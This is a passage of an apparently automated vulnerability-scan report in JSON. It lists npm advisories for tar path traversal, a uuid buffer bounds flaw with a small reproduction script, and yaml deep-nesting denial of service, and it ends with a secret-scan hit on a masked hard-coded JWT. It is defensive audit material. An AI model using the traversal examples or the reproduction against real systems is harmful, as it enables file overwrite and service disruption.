"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", "V3Score": 8.8 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-23950", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", "https://www.cve.org/CVERecord?id=CVE-2026-23950" ], "PublishedDate": "2026-01-20T01:15:57.87Z", "LastModifiedDate": "2026-02-18T15:50:29.91Z" }, { "VulnerabilityID": "CVE-2026-24842", "VendorIDs": [ "GHSA-34x7-hfp2-rc4v" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "4114cf1deb64beb5" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:300811b3c36b9566b1d65329a88d8096083e9932f7f92631612ae6ecb48a4c5b", "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-22", "CWE-59" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "V3Score": 8.2 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-24842", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", "https://www.cve.org/CVERecord?id=CVE-2026-24842" ], "PublishedDate": "2026-01-28T01:16:14.947Z", "LastModifiedDate": "2026-02-02T14:30:10.89Z" }, { "VulnerabilityID": "CVE-2026-26960", "VendorIDs": [ "GHSA-83g3-92jg-28cx" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "4114cf1deb64beb5" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.8", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:ce18f1061711bffca48c5e9df9bc6163a8eb6b9eecbe8d06eb40eb99b7b3b3da", "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-26960", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", "https://www.cve.org/CVERecord?id=CVE-2026-26960" ], "PublishedDate": "2026-02-20T02:16:53.883Z", "LastModifiedDate": "2026-02-20T19:24:16.537Z" }, { "VulnerabilityID": "CVE-2026-29786", "VendorIDs": [ "GHSA-qffp-2rhf-9h96" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "4114cf1deb64beb5" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5a3d9bf10095d43878802a97079c17cee8b8b5613695a5380ebe47aecb3f147d", "Title": "node-tar: hardlink path traversal via drive-relative linkpath", "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", "Severity": "HIGH", "CweIDs": [ "CWE-22", "CWE-59" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "V3Score": 6.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", "V3Score": 8.6 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29786", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", "https://www.cve.org/CVERecord?id=CVE-2026-29786" ], "PublishedDate": "2026-03-07T16:15:55.587Z", "LastModifiedDate": "2026-03-11T21:50:01.91Z" }, { "VulnerabilityID": "CVE-2026-31802", "VendorIDs": [ "GHSA-9ppj-qmqm-q256" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "4114cf1deb64beb5" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.11", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:f6694db464623dae542dd3497379d66840d291e825ea2b96df7b778a3639a0bc", "Title": "tar: tar: File overwrite via drive-relative symlink traversal", "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "ghsa": 3, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "V3Score": 5.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 6.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-31802", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", "https://www.cve.org/CVERecord?id=CVE-2026-31802" ], "PublishedDate": "2026-03-10T07:44:58.02Z", "LastModifiedDate": "2026-03-18T18:13:34.703Z" }, { "VulnerabilityID": "CVE-2025-64118", "VendorIDs": [ "GHSA-29xp-372q-xqph" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "4114cf1deb64beb5" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64118", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d5f535d785ea18a98ecabeda2c74adfa2449081dec08c36723e9bd757947caed", "Title": "node-tar: tar: node-tar: Information disclosure via reading a truncated tar file", "Description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.", "Severity": "MEDIUM", "CweIDs": [ "CWE-362", "CWE-367" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H", "V40Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "V3Score": 4.7 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64118", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d", "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9", "https://github.com/isaacs/node-tar/issues/445", "https://github.com/isaacs/node-tar/pull/446", "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph", "https://nvd.nist.gov/vuln/detail/CVE-2025-64118", "https://www.cve.org/CVERecord?id=CVE-2025-64118" ], "PublishedDate": "2025-10-30T18:15:33.673Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "GHSA-w5hq-g745-h8pq", "PkgID": "uuid@3.4.0", "PkgName": "uuid", "PkgIdentifier": { "PURL": "pkg:npm/uuid@3.4.0", "UID": "aa933471abfe8c0f" }, "InstalledVersion": "3.4.0", "FixedVersion": "14.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-w5hq-g745-h8pq", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:fe5d7ad550c9d1842d27c2afd0ec61889c9b038d903d794223a9466c36acc4f7", "Title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided", "Description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n ['v4',()=\u003ev4({},new Uint8Array(8),4)],\n ['v5',()=\u003ev5('x',ns,new Uint8Array(8),4)],\n ['v6',()=\u003ev6({},new Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,'NO_THROW'); }\n catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.3 } }, "References": [ "https://github.com/uuidjs/uuid", "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq" ], "PublishedDate": "2026-04-22T20:53:24Z", "LastModifiedDate": "2026-04-22T20:53:24Z" }, { "VulnerabilityID": "GHSA-w5hq-g745-h8pq", "PkgID": "uuid@7.0.3", "PkgName": "uuid", "PkgIdentifier": { "PURL": "pkg:npm/uuid@7.0.3", "UID": "5a74fe9a4bc16ef4" }, "InstalledVersion": "7.0.3", "FixedVersion": "14.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-w5hq-g745-h8pq", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:89c0219cc40408376a779b7f302ed5695d6007192e202c9aabe459869b359003", "Title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided", "Description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n ['v4',()=\u003ev4({},new Uint8Array(8),4)],\n ['v5',()=\u003ev5('x',ns,new Uint8Array(8),4)],\n ['v6',()=\u003ev6({},new Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,'NO_THROW'); }\n catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.3 } }, "References": [ "https://github.com/uuidjs/uuid", "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq" ], "PublishedDate": "2026-04-22T20:53:24Z", "LastModifiedDate": "2026-04-22T20:53:24Z" }, { "VulnerabilityID": "CVE-2026-33532", "VendorIDs": [ "GHSA-48c2-rrv3-qjmp" ], "PkgID": "yaml@2.8.1", "PkgName": "yaml", "PkgIdentifier": { "PURL": "pkg:npm/yaml@2.8.1", "UID": "a31a701f2d1ece72" }, "InstalledVersion": "2.8.1", "FixedVersion": "2.8.3, 1.10.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33532", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:28e9cf287c29080e512d9d80d33a2d37864ee68875b4f56abb24d9166cf24747", "Title": "yaml: yaml: Denial of Service via deeply nested YAML document parsing", "Description": "`yaml` is a YAML parser and serialiser for JavaScript. Parsing a YAML document with a version of `yaml` on the 1.x branch prior to 1.10.3 or on the 2.x branch prior to 2.8.3 may throw a RangeError due to a stack overflow. The node resolution/composition phase uses recursive function calls without a depth bound. An attacker who can supply YAML for parsing can trigger a `RangeError: Maximum call stack size exceeded` with a small payload (~2–10 KB). The `RangeError` is not a `YAMLParseError`, so applications that only catch YAML-specific errors will encounter an unexpected exception type. Depending on the host application's exception handling, this can fail requests or terminate the Node.js process. Flow sequences allow deep nesting with minimal bytes (2 bytes per level: one `[` and one `]`). On the default Node.js stack, approximately 1,000–5,000 levels of nesting (2–10 KB input) exhaust the call stack. The exact threshold is environment-dependent (Node.js version, stack size, call stack depth at invocation). Note: the library's `Parser` (CST phase) uses a stack-based iterative approach and is not affected. Only the compose/resolve phase uses actual call-stack recursion. All three public parsing APIs are affected: `YAML.parse()`, `YAML.parseDocument()`, and `YAML.parseAllDocuments()`. Versions 1.10.3 and 2.8.3 contain a patch.", "Severity": "MEDIUM", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "V3Score": 4.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33532", "https://github.com/eemeli/yaml", "https://github.com/eemeli/yaml/commit/1e84ebbea7ec35011a4c61bbb820a529ee4f359b", "https://github.com/eemeli/yaml/releases/tag/v1.10.3", "https://github.com/eemeli/yaml/releases/tag/v2.8.3", "https://github.com/eemeli/yaml/security/advisories/GHSA-48c2-rrv3-qjmp", "https://nvd.nist.gov/vuln/detail/CVE-2026-33532", "https://www.cve.org/CVERecord?id=CVE-2026-33532" ], "PublishedDate": "2026-03-26T20:16:15.543Z", "LastModifiedDate": "2026-04-02T18:11:37.49Z" } ] }, { "Target": "PerformicsSrc/src/screens/ReportDetailNew.js", "Class": "secret", "Secrets": [ { "RuleID": "jwt-token", "Category": "JWT", "Severity": "MEDIUM", "Title": "JWT token", "StartLine": 687, "EndLine": 687, "Code": { "Lines": [ { "Number": 685, "Content": " const category_name = categoryName;", "IsCause": false, "Annotation": "", "Truncated": false, "Highlighted": " const category_name = categoryName;", "FirstCause": false, "LastCause": false }, { "Number": 686, "Content": " ", "IsCause": false, "Annotation": "", "Truncated": false, "Highlighted": " ", "FirstCause": false, "LastCause": false }, { "Number": 687, "Content": " const auth_token = '********************************************************************************************************************************************************';", "IsCause": true, "Annotation": "", "Truncated": false, "Highlighted": " const auth_token = '********************************************************************************************************************************************************';", "FirstCause": true, "LastCause": true }, { "Number": 688, "Content": " const myHeaders = new Headers();", "IsCause": false, "Annotation": "", "Truncated": false, "Highlighted": " const myHeaders = new Headers();", "FirstCause": false, "LastCause": false } ] }, "Match": " const auth_token = '********************************************************************************************************************************************************';", "Offset": 23959 } ] } ] }